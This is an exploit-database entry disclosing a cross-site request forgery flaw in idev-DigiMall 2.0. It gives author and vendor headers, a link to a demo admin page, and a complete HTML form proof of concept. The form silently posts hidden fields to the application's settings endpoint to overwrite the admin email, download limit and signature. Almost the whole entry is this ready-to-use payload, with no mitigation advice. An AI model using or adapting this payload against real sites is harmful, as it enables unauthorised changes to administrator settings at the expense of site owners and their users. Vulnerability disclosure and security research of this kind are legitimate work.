idev-DigiMall version 2.0 suffers from a cross site request forgery vulnerability.
033404ca8e66fc70ccff6d36b19936f3bbc373d663416ec92c4647aae2883d83
# Exploit Title: idev-DigiMall 2.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://idevspot.com/
# Category:: webapps
# Demo : http://idevspot.com/demos/idev-digimall/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<FORM NAME="form1" METHOD="post" ACTION="../library/query.php">
<INPUT TYPE="hidden" NAME="controller" VALUE="SETTINGS~update~settings~1">
<input name="EMAIL" class="textarea100" value="noreply@idevspot.com" type="hidden">
<input name="MAXDL" class="textarea100" value="25" type="hidden">
<input name="SIGNATURE" class="textarea100" value="idev-DigiMall" type="hidden">
<input name="AFFID" class="textarea100" value="" type="hidden">
<select name="HELPBOX" size="1"><option> </option><option selected>Show</option><option>Hide</option></select>
<input name="Submit" value="Submit" type="submit">
</form>